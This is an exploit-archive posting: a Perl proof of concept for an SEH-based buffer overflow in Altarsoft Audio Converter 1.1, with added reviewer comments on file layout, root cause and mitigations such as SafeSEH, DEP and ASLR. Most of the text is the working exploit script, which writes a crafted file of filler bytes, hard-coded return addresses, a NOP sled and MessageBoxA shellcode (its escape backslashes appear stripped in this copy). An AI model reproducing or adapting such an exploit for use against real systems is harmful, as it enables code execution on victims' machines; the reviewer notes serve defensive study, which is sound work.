Altarsoft Audio Converter 1.1 Buffer Overflow
Posted on 17 December 2010
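#
#
#
# Exploit Title: Exploit Buffer Overflow Altarsoft Audio Converter 1.1(SEH)
# Date: 16/12/2010
# Author: C4SS!0 G0M3S
# Software Link: http://www.altarsoft.com/downloads/AltarsoftAudioConverter.exe
# Version: 111
# Tested on: WIN-XP SP3 PT-BR
# CVE: N/A
#
#
#Created By C4SS!0 G0M3S
#E-MAIL Louredo_@hotmail.com
#Home: http://www.invasao.com.br
#
#
# Reviewer notes
# --------------
# What the script does: it concatenates six strings and writes them to the
# file named on the command line. Nothing else happens; the fault the
# advisory is about lives in the converter, and the page does not say which
# field or code path of the converter mishandles the file.
#
# File layout, in write order: $buffer (one token repeated 4128 times),
# $eip and $seh (two 32-bit little-endian values from pack('V', ...)),
# $nseh, $nops (one token repeated 15 times), and the byte string the
# author labels "Shellcode MessageBoxA()". By their names and the "(SEH)"
# tag in the title, $nseh/$seh presumably target an exception-handler
# record -- TODO confirm against the vendor binary.
#
# NOTE(review): the string literals are kept exactly as the page prints
# them. As printed, "x41" is the three characters x, 4, 1, not one byte,
# so lengths reported by this listing are those of the printed text.
#
# NOTE(review): both packed addresses are hard-coded. The header lists a
# single test system (WIN-XP SP3 PT-BR); treat the values as specific to
# that build rather than as indicators that generalise.
#
# For defenders: the root cause is an unchecked copy of file-controlled
# data, so the durable fix is a length check in the converter's parser.
# Platform hardening for this bug class is SafeSEH/SEHOP, DEP and ASLR.
# For triage, a media file that is almost entirely one repeated value ahead
# of a short tail is a cheap signal worth flagging.
#
use strict;
use warnings;
use IO::File;    # loaded by the original; nothing below calls into it

# Clear the console and print the author's banner.
# `cls` and `color` are cmd.exe built-ins, so this assumes a Windows console.
# The two lines carrying the e-mail address are single-quoted: in a
# double-quoted string `@hotmail` is interpolated as an array and vanishes.
sub usage {
    system("cls");
    system("color 4f");
    print " ||=================================================================|| ";
    print " || || ";
    print " || Exploit Buffer Overflow Altarsoft Audio Converter 1.1(SEH) || ";
    print " || Created BY C4SS!0 G0M3S || ";
    print ' || Contact Louredo_@hotmail.com || ';
    print " || || ";
    print " ||=================================================================|| ";
    print("[+]Exploit: Buffer Overflow Altarsoft Audio Converter 1.1(SEH) ");
    print("[+]Date: 16/12/2010 ");
    print("[+]Author: C4SS!0 G0M3S ");
    print('[+]E-mail: Louredo_@hotmail.com ');
    print("[+]Home: http://www.invasao.com.br ");
    print("[+]Version: 2.1 ");
    print("[+]Impact: Hich ");
    print("[+]Tested On: WIN-XP SP3 Virtual Box ");
    return;
}

# Exactly one argument (the output file name) is required.
if (@ARGV != 1) {
    usage();
    print "[-]Usage: $0 <File Name> ";
    print "[-]Exemple: $0 music.wav ";
    exit(0);
}

my $file = $ARGV[0];

# Leading filler, then the two packed addresses and the short strings that
# sit around them (see the layout note in the header).
my $buffer = "x41" x 4128;
my $eip    = pack('V', 0x004FCA3F);
my $nseh   = "xebx06x90x90";
my $seh    = pack('V', 0x0042f486);
my $nops   = "x90" x 15;

#Shellcode MessageBoxA()
# Fixed string supplied by the author; reproduced unchanged from the page.
my $shellcode =
"x33xC0x33xC9x33xD2x33xDBx50x68x6Cx6Cx20x20x68x33x32x2Ex64x68x75x73x65x72x54x58xBBx7Bx1Dx80x7Cx50".
"xFFxD3x90x33xD2x52xB9x5Ex67x30xEFx81xC1x11x11x11x11x51x68x61x67x65x42x68x4Dx65x73x73x54x5Ax52x50".
"xB9x30xAEx80x7CxFFxD1x33xC9x33xD2x33xDBx51x68x53x20x20x20x68x47x30x4Dx33x68x53x21x30x20x68x20x43".
"x34x53x68x64x20x42x79x68x6Fx69x74x65x68x45x78x70x6Cx54x59x53x68x21x30x20x20x68x43x34x53x53x54x5B".
"x6Ax40x53x51x52xFFxD0x33xC0x50xBExFAxCAx81x7CxFFxD6";

my $payload = $buffer.$eip.$nseh.$seh.$nops.$shellcode;

# Three-argument open with a lexical handle. The original used
# open(f, ">$file"), where the name is parsed together with the mode: a name
# beginning with '>' or '&' would change how the file is opened, and the
# bareword handle `f` is a package global.
open(my $out, '>', $file) or die "ERROR: $! \n";

# Check the write and the close as well, so that the success messages below
# are not printed after a failed or short write.
print {$out} $payload or die "ERROR: $! \n";
close($out) or die "ERROR: $! \n";

usage();
print "[*]Identifying the size Shellcode ";
print "[*]The Shellcode Size:".length($shellcode)." ";
print "[*]Creating File $file ";
print "[*]The File $file Created Successfully ";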